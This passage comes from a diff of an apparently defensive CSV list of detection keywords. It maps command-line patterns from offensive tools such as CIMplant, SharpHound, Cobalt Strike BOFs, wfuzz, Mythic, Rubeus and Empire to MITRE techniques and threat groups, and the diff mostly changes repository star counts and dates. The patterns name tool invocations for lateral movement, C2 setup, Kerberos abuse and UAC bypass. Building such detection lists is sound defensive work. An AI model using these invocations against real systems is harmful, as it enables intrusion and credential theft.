WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"* -c all -d * --domaincontroller *","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"* -c all -d * --domaincontroller *","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "* -c command_exec --execute tasklist*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c command_exec --execute whoami*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"* -c CredEnum.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"* -c CredEnum.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "* -c edr_query *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c logon_events * -u *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c ls --directory * -u * -p *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" @@ -255,38 +255,38 @@ "* -c service_mod --execute create -s *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c upload --fileto * --file *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c vacant_system * -u *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"* -c -w *.txt -w *.txt --ss *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -c -w methods.txt -p 127.0.0.1*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -c -w users.txt --hs *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -c -z file*users.txt -z file*pass.txt *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -c -z range*1-10 --hc=BBB http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -w *.txt -w *.txt --ss *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -w methods.txt -p 127.0.0.1*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -w users.txt --hs *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -z file*users.txt -z file*pass.txt *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -z range*1-10 --hc=BBB http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* C:\ProgramData\sh.txt*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* C:\temp\w.log*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "* C:\Users\Public\build.bat*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* C:\Users\Public\build.vbs*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* C:\Users\Public\DtcInstall.txt*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"* c2 add *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"* c2 start http *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"* -c2server *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* c2 add *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* c2 start http *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* -c2server *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "* --CaCertPath *.pfx --CaCertPassword *","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "* CallDirect.py*","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","4","391","70","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" "* CallStranger.py*","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","4","391","70","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" -"* -caplet *.cap","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"* -caplet *.cap","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "* cassandra-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cassandra-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cccam-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* certipy-ad*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"* changepw * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" -"* charlotte.dll *","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"* certipy-ad*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* changepw * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"* charlotte.dll *","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "* CharSubroutine-Macro.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" -"* -CheckShareAccess -Verbose*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"* --check-tor *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* -ChildPath *fodhelper.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -ChildPath *sdclt.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* chimera.py *","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"* chimera.sh*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"* chimera_automation *.exe*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"* -CheckShareAccess -Verbose*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"* --check-tor *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -ChildPath *fodhelper.exe*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 